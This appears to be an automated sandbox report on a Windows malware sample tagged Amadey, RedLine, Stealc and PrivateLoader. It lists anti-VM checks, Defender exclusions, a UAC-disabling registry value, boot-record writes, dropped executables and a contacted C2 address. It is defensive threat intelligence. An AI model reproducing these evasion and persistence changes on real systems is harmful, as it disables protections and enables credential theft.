Malware Analysis Report

2024-07-11 11:01

Sample ID 240529-jpsjvaff3v
Target 223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231
SHA256 223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231
Tags
amadey 49e482 evasion trojan exelastealer privateloader redline stealc 1 @logscloudyt_bot zzvv bootkit discovery execution infostealer loader persistence ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231

Threat Level: Known bad

The file 223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231 was found to be: Known bad.

Malicious Activity Summary

amadey 49e482 evasion trojan exelastealer privateloader redline stealc 1 @logscloudyt_bot zzvv bootkit discovery execution infostealer loader persistence ransomware spyware stealer

Exela Stealer

RedLine payload

RedLine

Amadey

Stealc

UAC bypass

PrivateLoader

Modifies firewall policy service

Windows security bypass

Grants admin privileges

Modifies boot configuration data using bcdedit

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Reads user/profile data of web browsers

Windows security modification

Executes dropped EXE

Loads dropped DLL

Checks BIOS information in registry

Identifies Wine through registry keys

Reads data files stored by FTP clients

Checks computer location settings

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Delays execution with timeout.exe

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Gathers system information

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Collects information from the system

Modifies data under HKEY_USERS

System policy modification

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Runs net.exe

Gathers network information

Views/modifies file attributes

Checks processor information in registry

Kills process with taskkill

Creates scheduled task(s)

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-29 07:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 07:51

Reported

2024-05-29 07:53

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe

"C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 78.239.69.13.in-addr.arpa udp

Files

memory/5072-0-0x0000000000CB0000-0x000000000117E000-memory.dmp

memory/5072-1-0x0000000077A54000-0x0000000077A56000-memory.dmp

memory/5072-2-0x0000000000CB1000-0x0000000000CDF000-memory.dmp

memory/5072-3-0x0000000000CB0000-0x000000000117E000-memory.dmp

memory/5072-5-0x0000000000CB0000-0x000000000117E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

MD5 e9c43c9405c2823ac94cea6ffc1db64c
SHA1 949fb058c018c3a85eda4ef2de5b4634d639a9ef
SHA256 223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231
SHA512 9f0b0112da9f60e151e705af1b479b5e657b2264a99db075dfc59172dbfdfa7cfaa921491a822e7a4fa9a586877b696ae03cb3c216a5c0fb51b717e13e49b5d2

memory/5072-17-0x0000000000CB0000-0x000000000117E000-memory.dmp

memory/1296-18-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-20-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-19-0x0000000000FC1000-0x0000000000FEF000-memory.dmp

memory/1296-21-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-22-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-23-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-24-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-25-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-26-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-27-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-28-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1104-30-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1104-31-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1104-32-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1104-34-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-35-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-36-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-37-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-38-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-39-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-40-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/3772-42-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/3772-43-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-44-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-45-0x0000000000FC0000-0x000000000148E000-memory.dmp

memory/1296-46-0x0000000000FC0000-0x000000000148E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 07:51

Reported

2024-05-29 07:53

Platform

win11-20240426-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe"

Signatures

Amadey

trojan amadey

Exela Stealer

stealer exelastealer

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe N/A
N/A N/A C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe N/A
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe N/A
N/A N/A C:\Users\Admin\Pictures\MpOzMRhOyGRYJYp2mJ9HJNR9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS49C1.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\360TS_Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe N/A
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\1716969192_0\360TS_Setup.exe C:\Users\Admin\Pictures\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\config.ini C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\i18n\i18n.ini C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\softmgr\AdvUtils.ini C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\softmgr\AdvUtils.ini C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\1716969192_0\360TS_Setup.exe C:\Users\Admin\Pictures\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\writeable_test_240735828.dat C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\config.ini C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\i18n.ini C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job C:\Windows\SysWOW64\schtasks.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
